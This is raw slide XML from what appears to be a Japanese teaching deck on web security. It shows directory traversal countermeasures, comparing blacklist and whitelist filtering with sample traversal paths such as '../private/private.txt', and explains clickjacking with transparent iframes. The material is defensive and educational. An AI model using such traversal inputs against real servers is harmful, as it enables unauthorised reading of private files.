          <p:cNvPr id="6" name="テキスト ボックス 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D476567-6B0B-A7B2-9725-AB93A1F6244D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6241774" y="5239909"/>
            <a:ext cx="2629246" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>html.escape</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>を使わない</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29846771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ECBFD4-43BE-C3A9-5270-BECF5D7A010E}"/>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261094FF-D741-685E-5F2E-2BA61941807A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ディレクトリトラバーサル対策</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>正常アクセス：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ブラウザ画面</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ブラックリスト方式</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>しかし指定された場所以外はアクセス可能であるため指定していないフォルダである「</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>other</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」にはアクセスできてしまう。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="図 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4598172-CE73-1184-718D-B82A4C7D6923}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1862057" y="3699329"/>
            <a:ext cx="8467885" cy="1826828"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="テキスト ボックス 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CB73105-4B86-EDFB-DAE3-EA8FF39D827A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5106785" y="5476428"/>
            <a:ext cx="1978427" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>../other/other.txt</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31851939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24CF9E-3DDA-CFE2-B214-4C357A5434A3}"/>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4BFB8ACC-4C9E-BDD7-1369-04001539D2FC}"/>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サーバ側</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ホワイトリスト方式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F657462A-671B-F817-6135-826179E8122A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3539667" y="2827898"/>
            <a:ext cx="5112666" cy="3600731"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37925450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4B1E98-3EE7-E6C1-690C-97AB81F8082B}"/>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9226A1C0-E16B-11D2-CA88-5875A32086F6}"/>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正常アクセス：ブラウザ画面</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ホワイトリスト方式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>「</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」のフォルダにはもちろんアクセスできる。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFB3E7A8-EE2C-C93D-AEA2-07A04B3956FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1178725" y="3321237"/>
            <a:ext cx="9707330" cy="2457793"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9790513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9E28EA-8D26-1037-0404-63B8AD707CBE}"/>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4A766B19-303E-F7EB-3212-6C1988A9C341}"/>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不正アクセス：ブラウザ画面</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ホワイトリスト方式</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>「</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」以外のフォルダはアクセスできないようにしているため</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>不正アクセスになる</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="テキスト ボックス 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1437FEBC-9CC3-3C51-C133-3D0E24B48FFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4935263" y="6073363"/>
            <a:ext cx="2321469" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>../private/private.txt</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="図 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DFCD76D-478E-E216-4C76-3A79E79AEBE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1065473" y="3718125"/>
            <a:ext cx="10061050" cy="2355238"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12933381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9E28EA-8D26-1037-0404-63B8AD707CBE}"/>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4A766B19-303E-F7EB-3212-6C1988A9C341}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ディレクトリトラバーサル対策</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>不正アクセス：ブラウザ画面</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ホワイトリスト方式</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>「</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」以外のフォルダはアクセスできないようにしているため「</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>other</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」も</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>不正アクセスになる</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{617F8523-569D-C720-7549-401A2FAE1E08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2036650" y="3704913"/>
            <a:ext cx="8118700" cy="1993688"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="テキスト ボックス 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A41B1264-1119-F8C4-7A0C-338ECB90A4DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5106786" y="6046812"/>
            <a:ext cx="1978427" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>../other/other.txt</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19763698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28CA43-5D98-E925-FC68-7616983B4C92}"/>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DEFA239C-B58C-DD0F-2A1A-9EC16997ACAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>補足</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ファイル名の重複</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>何度もファイルを送信されることでファイル名が重複することがあり、データベースで元ファイル名と保存する時の別のファイル名を作り保存時とレスポンス時にファイル名を変えることもある。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>サービスの使用性</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ディレクトリ内にディレクトリを作成することもあるため全て遮断することが必ずしも良いとは限らない。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30121855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28CA43-5D98-E925-FC68-7616983B4C92}"/>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DEFA239C-B58C-DD0F-2A1A-9EC16997ACAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>補足</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ユーザ名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>会員制のサービスの場合だとサービスによって会員名のフォルダを作る事もあるためセッションと連携させてアクセスできるフォルダとできないフォルダを選定する必要がある。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8252695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0BEBF4-A998-E2CB-9799-A790B5DDE7CA}"/>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19B20FC5-BB25-C8D1-6569-CC660BA066DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>閲覧者への攻撃手法の一つで、攻撃用ページの上に透明表示に細工した外部サイトを重ねて表示し、外部サイト上で利用者に意図しない操作を行わせる手法。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>攻撃者は閲覧者にマウスなどで特定の位置を操作するよう仕向けるページを作成し、その上に被せるように</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>タグで外部の著名サイト（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SNS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>や商取引サイトなど）を表示する。外部サイトの方は見た目が透明になるような表示設定を行い、閲覧者に存在を気づかせないようにする。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="テキスト ボックス 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{713BF6E5-206D-EBFC-CC6D-EF1A04946F2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6097326" y="6388072"/>
            <a:ext cx="6094674" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>出典：https://e-words.jp/w/クリックジャッキング.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20139788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A294C-4305-8860-A6E3-46864BADD36D}"/>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0B83FC08-300D-92AE-8A27-3BA3F43037B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>クリックジャッキングの仕組み</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>他のサイトから持ってきたページを用意して、その後に罠となるサイトを上に貼り罠サイトを透明にしてボタンやリンクなどの位置を持ってきたサイトと同じ位置にして意図しないアクセスを誘導する。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="正方形/長方形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{995C23E8-27CA-7BA2-3E67-1131BCBE5C22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1593574" y="4113063"/>
            <a:ext cx="3506525" cy="20104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他のサイト</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="テキスト ボックス 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97CD2CD6-DC49-158A-411F-84358437E0E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2100341" y="6123543"/>
            <a:ext cx="2492990" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
